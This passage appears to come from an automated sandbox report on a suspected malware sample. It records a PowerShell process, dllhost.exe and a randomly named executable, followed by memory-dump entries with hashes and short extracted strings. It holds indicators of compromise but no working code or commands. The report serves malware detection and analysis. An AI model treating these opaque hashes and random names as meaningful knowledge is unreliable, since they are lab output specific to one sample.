                                                                                                    Commandline:"C:\Windows\SysWOW64\dllhost.exe"
                                                                                                    Imagebase:0x2e0000
                                                                                                    File size:19'256 bytes
                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Target ID:12
                                                                                                    Start time:02:47:51
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
                                                                                                    Imagebase:0x820000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Reset < >
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b4a29493aa47e7dbfa139418c46d82d95b19241cb1daaf59df0289aee4cb20d7
                                                                                                      • Instruction ID: 6276271f760978376ae5040208ab156a4e8dbd73df1674d73c78bfd168aede29
                                                                                                      • Opcode Fuzzy Hash: b4a29493aa47e7dbfa139418c46d82d95b19241cb1daaf59df0289aee4cb20d7
                                                                                                      • Instruction Fuzzy Hash: 41024A22A0E7C91FE7669B6848742657FE1EF56250F0901FFD098CB1E7DE28AD46C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43f765fd13dbc543563217b3a2a4a3854b0960830d8575bc64f27f0501a4bc48
                                                                                                      • Instruction ID: 0cab149daae4e79ba430762100de7902a05de2919ce3ff3c58a770d6907f172a
                                                                                                      • Opcode Fuzzy Hash: 43f765fd13dbc543563217b3a2a4a3854b0960830d8575bc64f27f0501a4bc48
                                                                                                      • Instruction Fuzzy Hash: 8AF1C430A09B4D8FEBA8DF68C8557F937D1FF54310F04426AE84DC76A5DB74A9428B81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cca9ef3e58a74bd8e1e485937be5b98c9ad2709af7c8fd717e34a149336f535c
                                                                                                      • Instruction ID: e25c0bd81a0bfe84e20217b5b78610e1ce526f359a6640b57d6f519d9e188f1b
                                                                                                      • Opcode Fuzzy Hash: cca9ef3e58a74bd8e1e485937be5b98c9ad2709af7c8fd717e34a149336f535c
                                                                                                      • Instruction Fuzzy Hash: 9AE1E370A09A4E8FEBA8DF68C8657E977D1EF54310F04436ED84DC72A5CE78A9418B81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U$65
                                                                                                      • API String ID: 0-546590537
                                                                                                      • Opcode ID: b4550d2c98db3be21cc2ed7eebec8859c88f4e0c263863d40cf3b3f2ec656eec
                                                                                                      • Instruction ID: 2702d1133b70918a0770398023ebdfe6726837922ef08220d7e15cecf83a1a98
                                                                                                      • Opcode Fuzzy Hash: b4550d2c98db3be21cc2ed7eebec8859c88f4e0c263863d40cf3b3f2ec656eec
                                                                                                      • Instruction Fuzzy Hash: 0AB13722F4FA8E4FEBA59B6C48655F97BD0EF592A0B4901FBD04CC71E3DA18AC058341
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: b4383af96cd102831d72c037532d4828b90e9949a1aee6c4661facf4cd099256
                                                                                                      • Instruction ID: 277a0d1ebda17d0c4032c856d3d947bbb5c6c89fe9e1cf6c67fd3c61a0249128
                                                                                                      • Opcode Fuzzy Hash: b4383af96cd102831d72c037532d4828b90e9949a1aee6c4661facf4cd099256
                                                                                                      • Instruction Fuzzy Hash: 81024632B0EB890FEBA59B6848646747BD1EF5A250F1904FED45CCB1E7DE18AC45C341
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: 0106b018dfcb9dc9ac810eaae43c29ee0b74f741bbaada806b7681721e7b5c65
                                                                                                      • Instruction ID: 893829906449b09f9ab212df66b79710d637bcc158569316cf319db0e9652b64
                                                                                                      • Opcode Fuzzy Hash: 0106b018dfcb9dc9ac810eaae43c29ee0b74f741bbaada806b7681721e7b5c65
                                                                                                      • Instruction Fuzzy Hash: F0B17A22B0EBCD1FE7A6977848645B47FE1DF5A250B0901FBC489CB1E3D918AD0AC391
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: 339001c9d8c7a7aff12917a28c3beaad076503eb1bc2d6b97c1f116614aba6cf
                                                                                                      • Instruction ID: 5c68970db29e792e92e8e753d416b40cd8a52d5324f0615d847f8543605468e1
                                                                                                      • Opcode Fuzzy Hash: 339001c9d8c7a7aff12917a28c3beaad076503eb1bc2d6b97c1f116614aba6cf
                                                                                                      • Instruction Fuzzy Hash: 10A17822B1FA8E0FE769976848722B577D1EF4A250F4D01BFD55DC71EBEE08A8028351
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dadf23d122183b595e231af4a05209137693a3c7552f65ed45a231f58039a837
                                                                                                      • Instruction ID: afa550b92cca6b28a3993a1ab30730c2807647241deb28b8f4e4e3b00b0120cb
                                                                                                      • Opcode Fuzzy Hash: dadf23d122183b595e231af4a05209137693a3c7552f65ed45a231f58039a837
                                                                                                      • Instruction Fuzzy Hash: D2B21831E0EA8D4FDBA5DB688464A687BE1EF59344F1900FDD05DCB2E3CA25AC46C741
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: f22f201c7b7b6f5395bfa8f54d21938bb0b752704b1947ffdf44be12ea0227c6
                                                                                                      • Instruction ID: 0dae7b738823e39fc0ce702e402598279e5aeaf414a459ef249e8d87909ad98e
                                                                                                      • Opcode Fuzzy Hash: f22f201c7b7b6f5395bfa8f54d21938bb0b752704b1947ffdf44be12ea0227c6
                                                                                                      • Instruction Fuzzy Hash: C0410721A0EBCE1FDB629BA848B45A57FB0EF1A250B0900FBD498CB1E3C9196849C351
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e35f2a17424a5a7d73a7bd6e29bf82f1c8167a1f4a800fec8b52a10caf79f20
                                                                                                      • Instruction ID: a28dbb51bbc68bca5d2f156159dcbe38062edd15c5d1c6cae8efa5e98bbbd822
                                                                                                      • Opcode Fuzzy Hash: 4e35f2a17424a5a7d73a7bd6e29bf82f1c8167a1f4a800fec8b52a10caf79f20
                                                                                                      • Instruction Fuzzy Hash: 95F19330A1DB4D8FDF94DF98C465EA97BE1FF68300F15026AD449D72A6CA64E842C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e03fcebf045aa415339f8f8b4cbc23dd8a1bfa2592995707b6aee7baebb313b4
                                                                                                      • Instruction ID: 429cd04ef0d9c6a759e661d6f0ac009e557fb435ed6546b148945849bbdf8296
                                                                                                      • Opcode Fuzzy Hash: e03fcebf045aa415339f8f8b4cbc23dd8a1bfa2592995707b6aee7baebb313b4
                                                                                                      • Instruction Fuzzy Hash: 3FE16832B0FB890FE7A59B6848616787BE1EF99250F1900FED05CC71E3DE28AD058342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 24c58fb298bb3f856aed234e9cb778a42eb1d1cc8408706c89959dfed55f00eb
                                                                                                      • Instruction ID: ffd43ede008c9ba864846c61cfed8a62d2863a734fa46eb37f77d704f5f5834c
                                                                                                      • Opcode Fuzzy Hash: 24c58fb298bb3f856aed234e9cb778a42eb1d1cc8408706c89959dfed55f00eb
                                                                                                      • Instruction Fuzzy Hash: EDB1D43060DB8D4FEB68DF68D8557F93BD1EF55310F04426AE84DC72A6CE74A9428B82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c73ac6b8719c9042d186bdf599adabf66de142f80825034541df3c2c6228040b
                                                                                                      • Instruction ID: 484e48415cb1f06f7266267c74ff35b41fdf7e7fc38fd888dd742f7fe8dbddf0
                                                                                                      • Opcode Fuzzy Hash: c73ac6b8719c9042d186bdf599adabf66de142f80825034541df3c2c6228040b
                                                                                                      • Instruction Fuzzy Hash: E661F62170EBCD0FDB669B7858755A57FE0EF57211B0A01FBC498CB0E3DA189849C352
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: da8fc1b6050ad40073872c9a54e112e6c7c99bccd703b54f896f7c01ec125d5c
                                                                                                      • Instruction ID: 9a9bd5b8f56ea57afe29a4c1a9364fa969dd6db11a5e881efbd48aeca650dc27
                                                                                                      • Opcode Fuzzy Hash: da8fc1b6050ad40073872c9a54e112e6c7c99bccd703b54f896f7c01ec125d5c
                                                                                                      • Instruction Fuzzy Hash: 00312422F5FA9F4FF7B597A818311F9A6C0EF59690B9A01FAD45CC31E3EE08A8004241
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6719773b2e34042f02909355aa273c8e513c54c8dc2a6fdb6f7a083faa5c5f3
                                                                                                      • Instruction ID: 53e60f17e8d21334f450486bced39f666403c06324f437e251225cdbdd4a717a
                                                                                                      • Opcode Fuzzy Hash: c6719773b2e34042f02909355aa273c8e513c54c8dc2a6fdb6f7a083faa5c5f3
                                                                                                      • Instruction Fuzzy Hash: 2021F922F2FA9E0BE3B5976C147117462C1DF49290B5D00BED65DC71EBDE19EC014211
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed95da1090debc37ad6e9da74236f1548e89f5ab1109cf19357fff96ec25ee77
                                                                                                      • Instruction ID: f51484dbc5ef269d351c1219f8fba5d8896211ceeee5322f8278c8553d4fc8fa
                                                                                                      • Opcode Fuzzy Hash: ed95da1090debc37ad6e9da74236f1548e89f5ab1109cf19357fff96ec25ee77
                                                                                                      • Instruction Fuzzy Hash: 02311270A1974ECEFBB49F95CC26BF932D4FF45319F410239D40E861B2DA786A46CA11
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22de71daba1a2e16628a2032b12194bacfd2c7751ef2f2b400c42aef2731ee88
                                                                                                      • Instruction ID: c6d561de4a704cdcd1e0724341ab4077e364963e16196cea69f82291e88dbb13
                                                                                                      • Opcode Fuzzy Hash: 22de71daba1a2e16628a2032b12194bacfd2c7751ef2f2b400c42aef2731ee88
                                                                                                      • Instruction Fuzzy Hash: 13210363F0F6CA0FEBA5B77858A51A42BD1EF5A6A0B5904BFE098C71F3D81859098311
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 847263b597c85f1a76626e42da4b1f2b9b2d59a9e788aee4fe5aa9ffecd11819
                                                                                                      • Instruction ID: 031ded85ff2707ee927bb1bc39c54db801fb9e543dca19700b7b399897a70524
                                                                                                      • Opcode Fuzzy Hash: 847263b597c85f1a76626e42da4b1f2b9b2d59a9e788aee4fe5aa9ffecd11819
                                                                                                      • Instruction Fuzzy Hash: 3321F923E0E7D50FEB6597A858665ACBBA1EF56220F0405FAD098871E3D9282945C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945296885.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: e4befbd04935d4183c17af5f7a96dce290f9d11f2914a0af73e41fab2f43f766
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: A001447121CB0C4FDB48EF4CE451AA5B7E0FB95364F10056EE58AC36A5D626E882CB45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fbe932ac20212e8b5f75e8c6dfa8899c3525c7c2dd56015f4cb9d59724485cb2
                                                                                                      • Instruction ID: 36b26a02fbdbb2a29767ea7d8084363da6768544c3ca931546290ae7a7b7c8b2
                                                                                                      • Opcode Fuzzy Hash: fbe932ac20212e8b5f75e8c6dfa8899c3525c7c2dd56015f4cb9d59724485cb2
                                                                                                      • Instruction Fuzzy Hash: 6901D622F0EA894FEBA5EFA848A486477D0DF2935075804FAD409CB1E7D818AD44C381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cdff7632c9ec36bb787fef458db8c9fd5b4e767388d88e826976bcc29023fd7a
                                                                                                      • Instruction ID: 55c4f9472ff446140edd3010a68db470adc749363b182b55f44f579758cec64a
                                                                                                      • Opcode Fuzzy Hash: cdff7632c9ec36bb787fef458db8c9fd5b4e767388d88e826976bcc29023fd7a
                                                                                                      • Instruction Fuzzy Hash: 6AF02B37B0DE0D4EE795936C58261F973D2DFC8131F550277C15EC3296ED15D8064240
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1945707899.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: af14645a8a2e0a3947db152e75fc8ce572a01aef7fc57382f3752f088527b083
                                                                                                      • Instruction ID: 3bcf986d2690111e6ad2d7a09a90a64813c62dfc2fee4faf5ea9f7a1468dedb2
                                                                                                      • Opcode Fuzzy Hash: af14645a8a2e0a3947db152e75fc8ce572a01aef7fc57382f3752f088527b083
                                                                                                      • Instruction Fuzzy Hash: 1CE0DF33B1EA0A0AFB9D666C28220F9B3D1DF84170798087FD54EC259BE92AAC124245
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9cc33d5cb39155bdb6e1e99be8e14dc5b154e05b8a82e97cb248f46b502c13ba
                                                                                                      • Instruction ID: a4e0cf3c5db491cf2641fb54d62d735c9bebfa7e3326782249db4c4075c5499d
                                                                                                      • Opcode Fuzzy Hash: 9cc33d5cb39155bdb6e1e99be8e14dc5b154e05b8a82e97cb248f46b502c13ba
                                                                                                      • Instruction Fuzzy Hash: 61B16D70E00209DFDB10CFA9C9857AEBBF2EF88354F14856DE815A7294EB74E841DB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7e1ab9a1d750c96b0483bcdad999b170f31296ea349e3a8c83585905613018d5
                                                                                                      • Instruction ID: 097466aee742034ee2713a415057c54d8afb34f294eebbe8bc2b55cba08321a5
                                                                                                      • Opcode Fuzzy Hash: 7e1ab9a1d750c96b0483bcdad999b170f31296ea349e3a8c83585905613018d5
                                                                                                      • Instruction Fuzzy Hash: AEB14D71E00209DFDB10CFA9D9857ADBBF2EF88314F1485ADE815E7294EB74A845CB81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-457652740
                                                                                                      • Opcode ID: be2023751eca4426fb339fbdf12380b2de0f2cd35873afc90e516956c4ff0fa4
                                                                                                      • Instruction ID: 3d40a8647517ae7bc2f3a2384863ee0fcd47aa5c28199cb7e0db81bfa300d184
                                                                                                      • Opcode Fuzzy Hash: be2023751eca4426fb339fbdf12380b2de0f2cd35873afc90e516956c4ff0fa4
                                                                                                      • Instruction Fuzzy Hash: 70027DF1B042169FCB258F78C851E7ABBEAAF81318F1484AAD955CB381DF31D841C792
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4'fq$4'fq
                                                                                                      • API String ID: 0-251729830
                                                                                                      • Opcode ID: 1f611772c4cb033d41c309c425f3f9fdd37c49d1400bda67ee505bfa03e64409
                                                                                                      • Instruction ID: 829df9e062af9b1caff06606edb499839f9509fa9ce477f7e9ef948bd6e40f0e
                                                                                                      • Opcode Fuzzy Hash: 1f611772c4cb033d41c309c425f3f9fdd37c49d1400bda67ee505bfa03e64409
                                                                                                      • Instruction Fuzzy Hash: B5927DB0B102189FD724DB58C841F6ABBB2BF85308F15C0A9D909AB755DF72DD828F91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$4'fq
                                                                                                      • API String ID: 0-3796779327
                                                                                                      • Opcode ID: 8f703af9f60d829a17d12110fcb24300d0fdbb8083a7ed765f53f49e308b13fa
                                                                                                      • Instruction ID: 84cf1ff0181ec14a4f8a5d3496f6f7427659b15f89ae341fc4514aa5d7eefa06
                                                                                                      • Opcode Fuzzy Hash: 8f703af9f60d829a17d12110fcb24300d0fdbb8083a7ed765f53f49e308b13fa
                                                                                                      • Instruction Fuzzy Hash: 10725BB4A102159FD724DB58C841F6ABBB2BF89318F15C0D9D909AB355CB72ED82CF90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                      • API String ID: 0-1373546133
                                                                                                      • Opcode ID: c1f7ffc01044d692a61431db2bae34f1af96165e3f7a17799f340219f6b9f295
                                                                                                      • Instruction ID: 89b91996ea44cee9d51e181e73c0c24e58a82f7c9f7fc0db72339bb2f51dd9b7
                                                                                                      • Opcode Fuzzy Hash: c1f7ffc01044d692a61431db2bae34f1af96165e3f7a17799f340219f6b9f295
                                                                                                      • Instruction Fuzzy Hash: 13D192F0A002199BCB14DFA8C551F5EBBB6AF89308F14C469E9056F785CF76EC428B91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                      • API String ID: 0-1373546133
                                                                                                      • Opcode ID: ed6c1ae5d5e341820a0a57cea1ad3788bab3e49e434d144a26265d423348ad20
                                                                                                      • Instruction ID: be5bf8af8cf45d6b32c07e59a25324dcd852a6a3528b96b221fb14c85d6bf213
                                                                                                      • Opcode Fuzzy Hash: ed6c1ae5d5e341820a0a57cea1ad3788bab3e49e434d144a26265d423348ad20
                                                                                                      • Instruction Fuzzy Hash: 4BD154B0A012299FDB14DBA8C851F5EBBB2BF84304F108595D909AF785CB75DD82CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$4'fq$4'fq
                                                                                                      • API String ID: 0-341578017
                                                                                                      • Opcode ID: 20058bf9b14e5e4314852899412b4cf7035812691cc2fdc0f040802eefb9d51a
                                                                                                      • Instruction ID: 32f56e536f35b7031a7b830560e33062630db2b895bf8a384b34c8cfefb11188
                                                                                                      • Opcode Fuzzy Hash: 20058bf9b14e5e4314852899412b4cf7035812691cc2fdc0f040802eefb9d51a
                                                                                                      • Instruction Fuzzy Hash: C7F1A5B0A002289FDB24DBA8C951F5EBBB3AF84304F1085A5D909AF795CF759D818F91
                                                                                                      Strings
                                                                                                      Memory Dump Source
